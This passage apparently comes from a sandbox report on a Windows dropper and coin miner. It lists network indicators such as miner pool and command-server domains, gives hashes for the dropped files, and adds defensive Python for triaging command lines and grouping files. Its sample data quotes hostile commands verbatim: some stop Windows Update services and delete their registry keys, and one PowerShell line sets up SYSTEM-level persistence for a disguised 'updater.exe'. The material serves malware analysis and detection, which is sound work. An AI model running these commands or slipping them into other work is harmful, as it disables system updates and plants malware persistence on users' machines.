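    "sc stop UsoSvc", "sc stop WaaSMedicSvc", "sc stop wuauserv", "sc stop bits", "sc stop dosvc",
    r'reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f',
    r'reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f',
    r'reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f',
    r'reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f',
    r'reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f',
    r"""powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }""",
    "wmic PATH Win32_VideoController GET Name, VideoProcessor",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINES).items():
        print(f"{key}: {value}")
```

Run stand-alone it prints the summary for the constructed sample; to use it on real data, replace SAMPLE_CMDLINES with the command lines from your EDR or Sysmon Event ID 1 records. The service list is deliberately narrow so that stopping an unrelated service does not fire; the escalation rule keys on the deletion of service keys rather than on stopping, since a stop alone is something administrators do.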

Network

Country  Destination         Domain                        Proto
US       8.8.8.8:53          134.121.24.20.in-addr.arpa    udp
US       8.8.8.8:53          us.imgjeoigaa.com             udp
HK       103.100.211.218:80  us.imgjeoigaa.com             tcp
US       8.8.8.8:53          218.211.100.103.in-addr.arpa  udp
RU       5.42.65.80:80       5.42.65.80                    tcp
US       8.8.8.8:53          80.65.42.5.in-addr.arpa       udp
US       8.8.8.8:53          aa.imgjeoogbb.com             udp
HK       154.221.26.108:80   aa.imgjeoogbb.com             tcp
US       8.8.8.8:53          108.26.221.154.in-addr.arpa   udp
US       8.8.8.8:53          206.23.85.13.in-addr.arpa     udp
US       8.8.8.8:53          50.23.12.20.in-addr.arpa      udp
US       8.8.8.8:53          203.151.224.20.in-addr.arpa   udp
GB       96.16.110.41:443                                  tcp
US       93.184.221.240:80                                 tcp
US       93.184.221.240:80                                 tcp
US       8.8.8.8:53          xmr-eu2.nanopool.org          udp
NL       51.15.67.17:14433   xmr-eu2.nanopool.org          tcp
US       8.8.8.8:53          pastebin.com                  udp
US       104.20.67.143:443   pastebin.com                  tcp
US       8.8.8.8:53          17.67.15.51.in-addr.arpa      udp
US       8.8.8.8:53          xmr-eu1.nanopool.org          udp
NL       51.15.65.182:14433  xmr-eu1.nanopool.org          tcp
US       8.8.8.8:53          143.67.20.104.in-addr.arpa    udp
US       8.8.8.8:53          182.65.15.51.in-addr.arpa     udp

Files

memory/1016-133-0x0000000000E10000-0x000000000126A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 61246e63964a1d50af9a3cf9c4e17798
SHA1 098ca418434983f9a4e013127311d14639acea08
SHA256 b768455072e94994ed5f2fc9b02a77640fb81f0dbe2124065d66a60f78cd3f6e
SHA512 bcd472bfbe4b9b498f75ae6e7ea47850ac243eac7c377b94aba3676a0bd32d3e78132a30ffadf51cfa03b0fd33c1743abcedf6517fc48426d85b1d1fe33303b7

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/976-173-0x0000000002EB0000-0x0000000003020000-memory.dmp

memory/976-174-0x0000000003020000-0x0000000003151000-memory.dmp

memory/1796-177-0x00007FF754C10000-0x00007FF754FCD000-memory.dmp

memory/976-178-0x0000000003020000-0x0000000003151000-memory.dmp

memory/4248-183-0x00000101F0710000-0x00000101F0732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jpzs0ftj.5oo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4248-193-0x00000101F0770000-0x00000101F0780000-memory.dmp

memory/4248-194-0x00000101F0770000-0x00000101F0780000-memory.dmp

memory/4248-195-0x00000101F0770000-0x00000101F0780000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e8ce785f8ccc6d202d56fefc59764945
SHA1 ca032c62ddc5e0f26d84eff9895eb87f14e15960
SHA256 d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4
SHA512 66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

memory/4560-209-0x0000019826FC0000-0x0000019826FD0000-memory.dmp

memory/4560-210-0x0000019826FC0000-0x0000019826FD0000-memory.dmp

memory/4560-211-0x0000019826FC0000-0x0000019826FD0000-memory.dmp

memory/1796-215-0x00007FF754C10000-0x00007FF754FCD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 35619dd2acc340c0d6839efdfbc55bb1
SHA1 73fde0c7a79d159d05f6d0e93bc37ff5d16908a0
SHA256 399f5103bea78e25d4cb61e7ccbb2f2fd4b8e72b4ad1dc4538e3a7747fab5c7a
SHA512 9470b2d38e70bee68d0fac054bf6b032fbeef2d726cbe24dbd00dd6a58e0ca837f28d600b5ffa564e9a833ae7cb3370a1abc4fe402514849e0708be326926832

memory/3356-226-0x000001C5B9520000-0x000001C5B9530000-memory.dmp

memory/3356-227-0x000001C5B9520000-0x000001C5B9530000-memory.dmp

memory/3356-228-0x000001C5B9520000-0x000001C5B9530000-memory.dmp

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/704-231-0x00007FF772E40000-0x00007FF7731FD000-memory.dmp

memory/2296-246-0x000002CAF8B30000-0x000002CAF8B40000-memory.dmp

memory/2296-245-0x000002CAF8B30000-0x000002CAF8B40000-memory.dmp

memory/2296-244-0x000002CAF8B30000-0x000002CAF8B40000-memory.dmp

memory/2296-256-0x000002CAFAED0000-0x000002CAFAEEC000-memory.dmp

memory/2296-257-0x000002CAFAEC0000-0x000002CAFAECA000-memory.dmp

memory/2296-258-0x00007FF4517F0000-0x00007FF451800000-memory.dmp

memory/2296-259-0x000002CAFB110000-0x000002CAFB12C000-memory.dmp

memory/2296-260-0x000002CAFB0F0000-0x000002CAFB0FA000-memory.dmp

memory/2296-261-0x000002CAFB150000-0x000002CAFB16A000-memory.dmp

memory/2296-262-0x000002CAFB100000-0x000002CAFB108000-memory.dmp

memory/2296-263-0x000002CAFB130000-0x000002CAFB136000-memory.dmp

memory/2296-264-0x000002CAFB140000-0x000002CAFB14A000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

memory/4724-268-0x0000019D2E800000-0x0000019D2E810000-memory.dmp

memory/4724-269-0x0000019D2E800000-0x0000019D2E810000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

memory/4724-289-0x0000019D2E800000-0x0000019D2E810000-memory.dmp

memory/4724-290-0x00007FF4FBC30000-0x00007FF4FBC40000-memory.dmp

memory/4724-293-0x0000019D2E809000-0x0000019D2E80F000-memory.dmp

C:\Program Files\Google\Libs\g.log

MD5 fdba80d4081c28c65e32fff246dc46cb
SHA1 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256 b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512 b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

memory/704-300-0x00007FF772E40000-0x00007FF7731FD000-memory.dmp

memory/4296-301-0x0000028016680000-0x00000280166A0000-memory.dmp

memory/4296-302-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-303-0x00000280166C0000-0x0000028016700000-memory.dmp

memory/2624-304-0x00007FF7819C0000-0x00007FF7819D6000-memory.dmp

memory/4296-305-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-307-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-308-0x0000028016CB0000-0x0000028016CD0000-memory.dmp

memory/4296-310-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-311-0x0000028016CB0000-0x0000028016CD0000-memory.dmp

memory/4296-313-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-315-0x00007FF784410000-0x00007FF784C04000-memory.dmp
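
The file list above is flattened as a path line followed by MD5/SHA1/SHA256/SHA512 lines, with "memory/..." dump names interleaved, and the sandbox records one entry per write event, so a payload that is copied to a second location (oldplayer.exe reappearing as 207aa4515d\oneetx.exe, XandETC.exe reappearing as C:\Program Files\Notepad\Chrome\updater.exe) shows up under both paths. The following Python is an added example, not code from the sandbox or from this report: it parses that format and groups the dropped files by SHA256, which shows how many distinct binaries were actually dropped and where each one was staged. SAMPLE is constructed from the report's own entries (SHA512 lines omitted for brevity, one duplicate entry and one memory-dump line kept on purpose); the function names are this example's own.

```python
"""Parse the sandbox's flattened file list and group dropped files by hash.

Added example, not code from the sandbox or the report. SAMPLE is constructed
from the report's entries; function names are this example's own.
"""
import re
from collections import defaultdict

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\aafg31.exe
MD5 61246e63964a1d50af9a3cf9c4e17798
SHA1 098ca418434983f9a4e013127311d14639acea08
SHA256 b768455072e94994ed5f2fc9b02a77640fb81f0dbe2124065d66a60f78cd3f6e

C:\Users\Admin\AppData\Local\Temp\aafg31.exe
MD5 61246e63964a1d50af9a3cf9c4e17798
SHA1 098ca418434983f9a4e013127311d14639acea08
SHA256 b768455072e94994ed5f2fc9b02a77640fb81f0dbe2124065d66a60f78cd3f6e

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

memory/976-173-0x0000000002EB0000-0x0000000003020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

C:\Program Files\Notepad\Chrome\updater.exe
MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
"""


def parse_file_entries(text):
    """One record per file entry; "memory/" dump names are skipped.

    A digest whose length does not match its algorithm is rejected, so a
    truncated extraction cannot pass as a usable indicator.
    """
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HEX_LEN[algo]:
                raise ValueError(f"{algo} digest of wrong length: {digest}")
            if current is not None:
                current[algo] = digest
        elif line.startswith("memory/"):
            current = None  # in-memory dump, not a file on disk
        else:
            current = {"path": line}
            records.append(current)
    return [r for r in records if "SHA256" in r]


def dedupe(records):
    """Collapse repeated write events of identical content to the same path."""
    seen, out = set(), []
    for r in records:
        key = (r["path"].lower(), r["SHA256"])
        if key not in seen:
            seen.add(key)
            out.append(r)
    return out


def group_by_sha256(records):
    """Map each distinct SHA256 to the sorted list of paths it was written under."""
    groups = defaultdict(set)
    for r in records:
        groups[r["SHA256"]].add(r["path"])
    return {digest: sorted(paths) for digest, paths in groups.items()}


if __name__ == "__main__":
    for digest, paths in group_by_sha256(dedupe(parse_file_entries(SAMPLE))).items():
        print(digest[:16], "->", "; ".join(paths))
```

On the constructed sample this yields three distinct binaries across six entries, and makes the staging visible: the same content as oldplayer.exe is written under 207aa4515d\oneetx.exe, and the same content as XandETC.exe is written under the updater.exe path that the scheduled task points at. Feed it the full Files section of a report (SHA512 lines included) to get the same grouping for the whole detonation.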